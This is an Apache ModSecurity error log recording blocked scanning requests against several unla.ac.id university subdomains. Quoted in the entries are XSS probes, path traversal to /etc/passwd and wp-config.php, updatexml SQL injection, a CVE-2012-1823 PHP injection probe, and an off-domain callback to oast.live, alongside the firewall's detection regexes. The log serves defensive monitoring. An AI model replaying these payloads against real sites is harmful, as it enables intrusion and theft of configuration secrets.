[Tue Aug 29 11:41:24.471509 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAYf-RwAAAAD"]
[Tue Aug 29 11:41:24.488920 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAcbSFMAAAAv"]
[Tue Aug 29 11:41:24.508500 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAcbSFQAAAAv"]
[Tue Aug 29 11:41:24.515592 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAYf-R4AAAAD"]
[Tue Aug 29 11:41:24.547476 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAc4EoUAAAAP"]
[Tue Aug 29 11:41:24.548364 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAActbMwAAAAH"]
[Tue Aug 29 11:41:24.556355 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO129MCo-f0AAAYf-SAAAAAD"]
[Tue Aug 29 11:41:25.415482 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAYf-SMAAAAD"]
[Tue Aug 29 11:41:25.424354 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc0Nf0AAAAM"]
[Tue Aug 29 11:41:25.429471 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAc2dSYAAAAN"]
[Tue Aug 29 11:41:25.432936 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAQkBccAAAAC"]
[Tue Aug 29 11:41:25.464619 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc2dScAAAAN"]
[Tue Aug 29 11:41:25.467705 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc0Nf4AAAAM"]
[Tue Aug 29 11:41:25.484879 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc2dSgAAAAN"]
[Tue Aug 29 11:41:25.484902 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAaZ9tAAAAAo"]
[Tue Aug 29 11:41:25.506981 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129cCo-f0AAAc2dSkAAAAN"]
[Tue Aug 29 11:41:25.526278 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAc2dSoAAAAN"]
[Tue Aug 29 11:41:25.536901 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAYf-SgAAAAD"]
[Tue Aug 29 11:41:25.548915 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAcoNWYAAAAF"]
[Tue Aug 29 11:41:25.553629 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAQkBcwAAAAC"]
[Tue Aug 29 11:41:26.359765 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc2dS4AAAAN"]
[Tue Aug 29 11:41:26.363570 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAc0NgQAAAAM"]
[Tue Aug 29 11:41:26.382926 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAcbSGMAAAAv"]
[Tue Aug 29 11:41:26.384851 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAcriisAAAAB"]
[Tue Aug 29 11:41:26.395049 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAcoNWkAAAAF"]
[Tue Aug 29 11:41:26.395054 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAUKhF0AAABC"]
[Tue Aug 29 11:41:26.427748 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAaZ9tgAAAAo"]
[Tue Aug 29 11:41:26.508340 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAcrii0AAAAB"]
[Tue Aug 29 11:41:26.543569 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAUKhGAAAABC"]
[Tue Aug 29 11:41:26.553140 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ajax_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:ajax_path: ../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZO129sCo-f0AAAc0NggAAAAM"]
[Tue Aug 29 11:41:26.567585 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAcbSGUAAAAv"]
[Tue Aug 29 11:41:26.583767 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAc2dTMAAAAN"]
[Tue Aug 29 11:41:26.597608 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAcbSGYAAAAv"]
[Tue Aug 29 11:41:26.644514 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAaZ9twAAAAo"]
[Tue Aug 29 11:41:26.656951 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAUKhGMAAABC"]
[Tue Aug 29 11:41:26.659962 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:month: '>\\x22<svg/onload=confirm('month')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO129sCo-f0AAAc0NgsAAAAM"]
[Tue Aug 29 11:41:26.696515 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo md5('CVE-2012-1823'); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129sCo-f0AAAQkBdMAAAAC"]
